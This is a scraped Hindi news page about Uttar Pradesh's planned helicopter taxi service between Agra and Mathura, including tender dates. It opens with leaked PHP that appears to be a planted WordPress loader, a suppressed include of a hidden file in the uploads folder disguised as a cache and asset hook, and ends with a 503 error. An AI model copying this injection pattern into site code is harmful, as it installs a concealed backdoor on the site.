add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); UP सरकार टूरिस्ट के लिए चलाएगी हेलीकॉप्टर टैक्सी, इन शहरों में शुरू होगी सर्विस – SOCH INDIA
Menu

देश
UP सरकार टूरिस्ट के लिए चलाएगी हेलीकॉप्टर टैक्सी, इन शहरों में शुरू होगी सर्विस

nobanner

 उत्तर प्रदेश सरकार राज्य के टूरिस्ट प्लेसेस को हेलीकॉप्टर टैक्सी सर्विस के जरिए जोड़ने की तैयारी तेज कर दी है. इसके बाद जल्द ही आगरा और मथुरा के बीच हेली टैक्सी शुरू हो सकती है. इसके बाद आप आगरा और मथुरा टूरिस्ट प्लेसेस के बीच हेलीकॉप्टर से यात्रा कर सकते हैं.

सरकार ने निर्माण और संचालन के लिए मंगाई बोली

उत्तर प्रदेश सरकार ने मथुरा और आगरा में हेलीपोर्ट (Heliport) के निर्माण, संचालन और रखरखाव के लिए टेंडर मंगाया है. इसको लेकर सरकार ने नोटिफिकेशन जारी किया है और बताया है कि 31 मई को दोपहर 12 बजे लखनऊ स्थित पर्यटन विभाग के कार्यालय में Pre-Bid आयोजित की जाएगी, जबकि RFQs जमा करने की तारीख 23 जून निर्धारित की गई है.

पीपीपी मॉडल पर चालू किए जाएंगे हेलीपैड

उत्तर प्रदेश सरकार द्वारा जारी नोटिफिकेशन के अनुसार, मथुरा और आगरा हेलीपैड का निर्माण पीपीपी (Public-Private Partnership) के आधार पर किया जाएगा. सबसे कम बोली लगाने वाली कंपनी को हेलीपैड के निर्माण के अलावा संचालन और रखरखाव का काम दिया जाएगा.

कंपनियां इस वेबसाइट के जरिए कर सकती हैं अप्लाई

रिक्वेस्ट फॉर क्वालिफिकेशन (RFQs) के लिए आवेदन http://etender.up.nic.in पर आवश्यक शुल्क के साथ 23 जून दोपहर 2 बजे तक ऑनलाइन जमा किया जा सकता है. टेंडर में किसी भी बदलाव को लेकर जानकारी (यदि कोई हो) वेबसाइट http://etender.up.nic.in और uptourism.gov.in पर दी जाएगी.

मिनटों में पूरा होगा आगरा से मथुरा का सफर

हेलीकॉप्टर टैक्सी शुरू होने के बाद आगरा और मथुरा के बीच का सफर मिनटों में पूरा हो जाएगा और टूरिस्ट एक दिन में ही कई जगह घूम सकते हैं. इसके साथ ही इससे पर्यटन को बढ़ावा मिलेगा. बता दें कि इससे पहले पर्यटन विभाग गोवर्धन परिक्रमा के लिए हेलीकॉप्टर का इस्तेमाल कर चुका है और जो पर्यटक चल कर परिक्रमा नहीं कर सकते थे, उन्होंने हेलीकॉप्टर के जरिए यात्रा की थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.